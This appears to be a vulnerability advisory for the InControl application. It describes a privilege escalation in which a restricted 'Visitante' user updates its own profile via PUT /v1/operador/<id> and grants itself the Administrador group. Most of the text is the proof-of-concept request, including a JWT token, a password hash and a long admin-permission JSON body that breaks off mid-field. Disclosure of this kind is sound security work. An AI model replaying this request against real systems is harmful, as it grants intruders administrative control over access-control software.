| Description | A critical vulnerability was found in the InControl software. The vulnerability is an Improper Handling of Insuffient Permissions or Privileges that leads to Elevation of Privileges inside the application, where a "Visitante" profile with very restricted permissions can obtain Admin access in the application. The vulnerable request is a PUT request on /v1/operador/<id> which is an update profile request, the application fails to check whether the user can modify it's own attributes, allowing the modify it's own permissions, leading to privilege escalation.
PUT /v1/operador/4 HTTP/1.1
Host: localhost:4441
Content-Length: 18599
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0LCJ1c2VybmFtZSI6InBlbnRlc3RlciIsImV4cCI6MTc1MDI5NTIyNywiZW1haWwiOiIiLCJpc19hY3RpdmUiOnRydWUsImlzX3N1cGVydXNlciI6ZmFsc2UsInBlc3NvYSI6eyJub21lIjoicGVudGVzdGVyIn0sInBlcm1pc3Npb25zIjp7InZpc2l0YW50ZSI6eyJ2aXNpdGFudGUiOnsiaWRfcGVybWlzc2FvX2FkZCI6MTMzLCJpZF9wZXJtaXNzYW9fY2hhbmdlIjoxMzQsImlkX3Blcm1pc3Nhb19kZWxldGUiOjEzNSwiaWRfcGVybWlzc2FvX3ZpZXciOjEzNn19fX0.Gady04763SMCI0L1kOroIo4JQOCi-9fQpB0__mns6_Q
Accept-Language: pt-BR,pt;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: https://localhost:4445
Referer: https://localhost:4445/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"id":4,"pessoa":{"id":8,"nome_completo":"pentester","email":"[email protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":4,"username":"pentester","password":"pbkdf2_sha256$150000$sgWi9Jlst7dj$/3ZnZAgXCpPnBnaDYBH3s9Q/JdUDJWjqjHvX85rIRag=","groups":{"id":1,"name":"Administrador","permissions":[{"id":37,"codename":"add_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":38,"codename":"change_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":39,"codename":"delete_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":40,"codename":"view_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":385,"codename":"add_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":386,"codename":"change_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":387,"codename":"delete_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":388,"codename":"view_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":45,"codename":"add_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":46,"codename":"change_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":47,"codename":"delete_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":48,"codename":"view_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":53,"codename":"add_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":54,"codename":"change_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":55,"codename":"delete_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":56,"codename":"view_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":49,"codename":"add_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":50,"codename":"change_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":51,"codename":"delete_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":52,"codename":"view_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":321,"codename":"add_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":322,"codename":"change_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":323,"codename":"delete_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":324,"codename":"view_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":345,"codename":"add_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":346,"codename":"change_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":347,"codename":"delete_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":348,"codename":"view_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":354,"codename":"change_progressocomunicacao","content_type":{"id":89,"app_label":"comunicacao_progress","model":"progressocomunicacao"}},{"id":261,"codename":"add_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":262,"codename":"change_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":263,"codename":"delete_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":264,"codename":"view_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":273,"codename":"add_credencialmipip","content_type":{"id":69,"app_label":"credencial","model":"credencialmipip"}},{"id":274,"codename":"change_credencialmipip","content_type":{"id":69,"app_label":"credencial","model":"credencialmipip"}},{"id":275,"codename":"delete_credencialmipip","content_type":{"id":69,"app_label":"credencial","model":"credencialmipip"}},{"id":276,"codename":"view_credencialmipip","content_type":{"id":69,"app_label":"credencial","model":"credencialmipip"}},{"id":249,"codename":"add_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":250,"codename":"change_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":251,"codename":"delete_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":252,"codename":"view_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":245,"codename":"add_historicalcartao","content_type":{"id":62,"app_label":"credencial","model":"historicalcartao"}},{"id":246,"codename":"change_historicalcartao","content_type":{"id":62,"app_label":"credencial","model":"historicalcartao"}},{"id":247,"codename":"delete_historicalcartao","content_type":{"id":62,"app_label":"credencial","model":"historicalcartao"}},{"id":248,"codename":"view_historicalcartao","content_type":{"id":62,"app_label":"credencial","model":"historicalcartao"}},{"id":269,"codename":"add_historicalcontroleremoto","content_type":{"id":68,"app_label":"credencial","model":"historicalcontroleremoto"}},{"id":270,"codename":"change_historicalcontroleremoto","content_type":{"id":68,"app_label":"credencial","model":"historicalcontroleremoto"}},{"id":271,"codename":"delete_historicalcontroleremoto","content_type":{"id":68,"app_label":"credencial","model":"historicalcontroleremoto"}},{"id":272,"codename":"view_historicalcontroleremoto","content_type":{"id":68,"app_label":"credencial","model":"historicalcontroleremoto"}},{"id":285,"codename":"add_historicalplaca","content_type":{"id":72,"app_label":"credencial","model":"historicalplaca"}},{"id":286,"codename":"change_historicalplaca","content_type":{"id":72,"app_label":"credencial","model":"historicalplaca"}},{"id":287,"codename":"delete_historicalplaca","content_type":{"id":72,"app_label":"credencial","model":"historicalplaca"}},{"id":288,"codename":"view_historicalplaca","content_type":{"id":72,"app_label":"credencial","model":"historicalplaca"}},{"id":257,"codename":"add_usersdkimage","content_type":{"id":65,"app_label":"credencial","model":"usersdkimage"}},{"id":258,"codename":"change_usersdkimage","content_type":{"id":65,"app_label":"credencial","model":"usersdkimage"}},{"id":259,"codename":"delete_usersdkimage","content_type":{"id":65,"app_label":"credencial","model":"usersdkimage"}},{"id":260,"codename":"view_usersdkimage","content_type":{"id":65,"app_label":"credencial","model":"usersdkimage"}},{"id":109,"codename":"add_historicaldepartamento","content_type":{"id":28,"app_label":"departamento","model":"historicaldepartamento"}},{"id":110,"codename":"change_historicaldepartamento","content_type":{"id":28,"app_label":"departamento","model":"historicaldepartamento"}},{"id":111,"codename":"delete_historicaldepartamento","content_type":{"id":28,"app_label":"departamento","model":"historicaldepartamento"}},{"id":112,"codename":"view_historicaldepartamento","content_type":{"id":28,"app_label":"departamento","model":"historicaldepartamento"}},{"id":85,"codename":"add_dispositivoencontrado","content_type":{"id":22,"app_label":"dispositivo","model":"dispositivoencontrado"}},{"id":86,"codename":"change_dispositivoencontrado","content_type":{"id":22,"app_label":"dispositivo","model":"dispositivoencontrado"}},{"id":87,"codename":"delete_dispositivoencontrado","content_type":{"id":22,"app_label":"dispositivo","model":"dispositivoencontrado"}},{"id":88,"codename":"view_dispositivoencontrado","content_type":{"id":22,"app_label":"dispositivo","model":"dispositivoencontrado"}},{"id":93,"codename":"add_historicaldispositivo","content_type":{"id":24,"app_label":"dispositivo","model":"historicaldispositivo"}},{"id":94,"codename":"change_historicaldispo |
|---|